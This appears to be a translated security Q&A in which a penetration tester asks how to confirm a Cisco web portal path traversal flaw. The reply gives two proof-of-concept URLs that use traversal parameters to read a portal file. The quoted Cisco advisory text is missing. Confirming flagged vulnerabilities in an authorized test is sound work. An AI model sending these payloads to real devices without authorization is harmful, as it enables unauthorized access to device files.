我使用Nessus来确定客户的Cisco容易受到只读路径遍历漏洞的攻击。到目前为止,我已经尝试查看登录门户页面源代码、nmap -sV -A <host>、nmap脚本http-cisco-anyconnect和ssh -vvv -p port <host>,而没有获得有关设备、其操作系统或修补程序状态的任何信息。
思科提供的咨询意见如下:
这项工作是外部渗透测试的一部分,我无法从他们的内部网络访问该设备。
有人能提供其他技术来获取设备信息或描述我如何构造带有路径遍历字符的HTTP请求,以确认此设备易受攻击吗?
发布于 2021-07-30 19:28:34
有一些概念URL的公开发布证明可用于测试此漏洞:
https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../和
https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.luahttps://security.stackexchange.com/questions/253807
复制相似问题